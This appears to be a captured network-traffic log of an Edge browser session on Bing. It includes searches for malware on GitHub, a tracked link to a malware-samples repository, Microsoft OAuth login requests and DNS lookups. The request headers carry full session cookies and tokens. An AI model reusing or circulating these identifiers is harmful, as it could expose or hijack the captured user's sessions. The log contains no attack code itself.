SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:52 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144352.8b9b483
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 654
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:56 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144356.8b9bba7
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=1D2FDF991A984BF98138E4B738C9DC15&ID=SERP,5131.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Dviruses%2Bgithub%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM%26ntb%3D1

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/GLinkPingPost.aspx?IG=1D2FDF991A984BF98138E4B738C9DC15&ID=SERP,5131.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Dviruses%2Bgithub%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM%26ntb%3D1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Cache-Control: private
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Access-Control-Allow-Origin: *
X-EventID: 670163eae9804bd89074caa62d396a0a
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-q4J69bTHJLJdQRspol4PIwatL1Nzk6/EP2jcQPPWA98='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 1D396E0529E04C03AA50F1028322F9A5 Ref B: LON601060108054 Ref C: 2024-10-05T16:06:02Z
Content-Length: 0
Date: Sat, 05 Oct 2024 16:06:02 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:06:02 GMT; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144362.8b9d910
GET

https://www.bing.com/qbox?query=anydd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=d8ae9d7482524a1a937fe57d0f44779f&oit=1&cp=5&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=anydd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=d8ae9d7482524a1a937fe57d0f44779f&oit=1&cp=5&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o
DNS

login.microsoftonline.com

msedge.exe

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN A

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.akadns.net

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.14

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.76

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.17

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.136

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.72

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.20

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.138

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.140
GET

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b550fbea-11d9-4f6e-a407-8a314d8f6920&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220DD30F05AB304142B388EAD39E0E9879%22%7d

msedge.exe

Remote address:

20.190.160.14:443

Request

GET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b550fbea-11d9-4f6e-a407-8a314d8f6920&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220DD30F05AB304142B388EAD39E0E9879%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: cf31b820-bdf4-40ac-a6d8-925383702c00
x-ms-ests-server: 2.1.19005.9 - SEC ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
x-ms-srs: 1.P
referrer-policy: strict-origin-when-cross-origin
x-xss-protection: 0
set-cookie: buid=0.AXQAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeGqjmCRFs3ws2JcQVy2chFNBjkQikiKAh6s8F8g02dmyGereWmX2EqppL6WBawVn7VvlftSfBxugO3gXFcxlYwq_zVlqEzJV1BbbYkXLqHF4gAA; expires=Mon, 04-Nov-2024 16:05:33 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=AjDHz2JvlDxPodpZwyudbUCCeMQLAQAAAMxak94OAAAA; expires=Mon, 04-Nov-2024 16:05:33 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe5QhEMbLN3X8pB2iW9oC8yZOenIh-Afw_NEkbSQoh35m7DfC8_ayKvlfVTYXtYIseCSj-Z-RPJ5KwwcRaF0M8268YqUps5rz195vlbJSWJcRaftKSHr2remKGSneRXeFVoKLwsyBJ9sy2tcmwiNil7mSD8wIsprlJA0vgTctZPa4gAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
set-cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
date: Sat, 05 Oct 2024 16:05:32 GMT
content-length: 671
GET

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b98085d5-b708-49a2-b00c-6bf09b7226b6&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%221D2FDF991A984BF98138E4B738C9DC15%22%7d

msedge.exe

Remote address:

20.190.160.14:443

Request

GET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b98085d5-b708-49a2-b00c-6bf09b7226b6&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%221D2FDF991A984BF98138E4B738C9DC15%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: buid=0.AXQAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeGqjmCRFs3ws2JcQVy2chFNBjkQikiKAh6s8F8g02dmyGereWmX2EqppL6WBawVn7VvlftSfBxugO3gXFcxlYwq_zVlqEzJV1BbbYkXLqHF4gAA
cookie: fpc=AjDHz2JvlDxPodpZwyudbUCCeMQLAQAAAMxak94OAAAA
cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe5QhEMbLN3X8pB2iW9oC8yZOenIh-Afw_NEkbSQoh35m7DfC8_ayKvlfVTYXtYIseCSj-Z-RPJ5KwwcRaF0M8268YqUps5rz195vlbJSWJcRaftKSHr2remKGSneRXeFVoKLwsyBJ9sy2tcmwiNil7mSD8wIsprlJA0vgTctZPa4gAA
cookie: x-ms-gateway-slice=estsfd
cookie: stsservicecookie=estsfd

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: 9352a875-fc72-443e-abaa-fa8620862000
x-ms-ests-server: 2.1.19005.9 - FRC ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
x-ms-srs: 1.P
referrer-policy: strict-origin-when-cross-origin
x-xss-protection: 0
set-cookie: buid=0.AXQAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeE8POhbjAldv1pZQ8EUT0iSfXupVaIcZkBs811LRgq612ZYFp5Pcx1zQbZVOX7qVkk86hM0tZwvKFAEiD1wrZ3SDGDPQPTBZFa30PJKopl0wgAA; expires=Mon, 04-Nov-2024 16:05:51 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=AjDHz2JvlDxPodpZwyudbUCCeMQLAgAAAMxak94OAAAA; expires=Mon, 04-Nov-2024 16:05:51 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
date: Sat, 05 Oct 2024 16:05:50 GMT
content-length: 672
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/th?id=OSK.21d2c54a49f9f79cbcf2d1e779ef9258&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.21d2c54a49f9f79cbcf2d1e779ef9258&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 6531
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144338.fb65407
GET

https://www.bing.com/th?id=OSK.d0a9640d5e07422b93950ecce6a2fae0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.d0a9640d5e07422b93950ecce6a2fae0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
